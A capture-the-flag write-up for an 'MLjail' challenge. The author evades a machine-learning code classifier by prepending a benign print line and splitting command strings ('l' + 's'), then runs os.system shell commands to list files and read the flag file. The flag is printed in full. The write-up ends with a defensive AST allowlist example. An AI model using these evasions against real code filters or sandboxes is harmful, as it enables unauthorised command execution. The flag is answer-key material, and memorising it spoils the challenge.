Solution

This program is essentially just a Python code interpreter. But based on the description, there's a filter that classifies the intent of the submitted code as good_code or bad_code. The model is trained on bad_code.txt and good_code.txt, and their contents are very straightforward.

Attempt 1

So let's just try some code:

>>> __import__('os')
Bad Code Detected...

Well, that makes sense, since bad_code.txt contains code very similar to that.

Attempt 2

Okay, what if we take a line of code from good_code.txt and chain it with the attack code?

>>> print('Hello, world!'); __import__('os')
Hello, world!

Okay, so that works! Let's try calling system('ls') from os so that we can see the files in the current directory.

>>> print('Hello, world!'); __import__('os').system('ls')
Bad Code Detected...

Well, that is detected.

Attempt 3

What if we try obfuscating 'ls' as 'l' + 's'? The two pieces get tokenized differently, but the string is the same once evaluated.

>>> print('Hello, world!'); __import__('os').system('l' + 's')
Dockerfile
MLjail
ReadME.md
docker-compose.yml
entrypoint.sh
Hello, world!

There we go. It seems to have the same file structure as the zip file provided to us, which means the flag should just be in MLjail/flag.txt. Now let's try the same method as above, but calling cat instead.

>>> print('Hello, world!'); __import__('os').system('cat MLjail/flag.txt')
PCTF{M@chin3_1earning_d0_be_tR@nsformati0na1_1818726356}Hello, world!

I was surprised that it worked immediately; I guess that makes sense, since cat was not defined in bad_code.txt. But there it is, the flag is:

PCTF{M@chin3_1earning_d0_be_tR@nsformati0na1_1818726356}
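
For contrast with the token-based classifier bypassed above, here is a structural allowlist over the parsed AST, which decides on the calls and node types present rather than on how closely the tokens resemble bad_code.txt. This is an added example, not the challenge's code or part of the original writeup; check_code and the allowlist contents are assumptions (a service that only needs print()).

```python
import ast

# Assumption: print() is the only builtin the service needs to expose.
ALLOWED_CALLS = {"print"}
# Node types permitted anywhere in submitted code. Everything else
# (Attribute, Import, Subscript, Lambda, ...) is rejected outright.
ALLOWED_NODES = (
    ast.Module, ast.Expr, ast.Call, ast.Name, ast.Load,
    ast.Constant, ast.BinOp, ast.Add,
)

def check_code(source):
    """Return (ok, reason) for one submission (hypothetical helper)."""
    try:
        tree = ast.parse(source, mode="exec")
    except SyntaxError as exc:
        return False, f"syntax error: {exc.msg}"
    for node in ast.walk(tree):
        if not isinstance(node, ALLOWED_NODES):
            return False, f"node type not allowed: {type(node).__name__}"
        if isinstance(node, ast.Call):
            # Only direct calls to allowlisted names; obj.method() is refused.
            if not isinstance(node.func, ast.Name) or node.func.id not in ALLOWED_CALLS:
                return False, "call target not allowed"
            if node.keywords:
                return False, "keyword arguments not allowed"
        elif isinstance(node, ast.Name) and node.id not in ALLOWED_CALLS:
            return False, f"name not allowed: {node.id}"
    return True, "ok"

if __name__ == "__main__":
    # Inputs taken from the attempts in this writeup, plus two benign lines.
    samples = [
        "print('Hello, world!')",
        "__import__('os')",
        "print('Hello, world!'); __import__('os')",
        "print('Hello, world!'); __import__('os').system('l' + 's')",
        "print('l' + 's')",
    ]
    for line in samples:
        print(check_code(line), "<-", line)
```

Chaining a good_code.txt line in front and splitting the string both change the token statistics but not the tree: the call target is still not print, so every attempt from this writeup is rejected, while 'l' + 's' passed to print stays allowed.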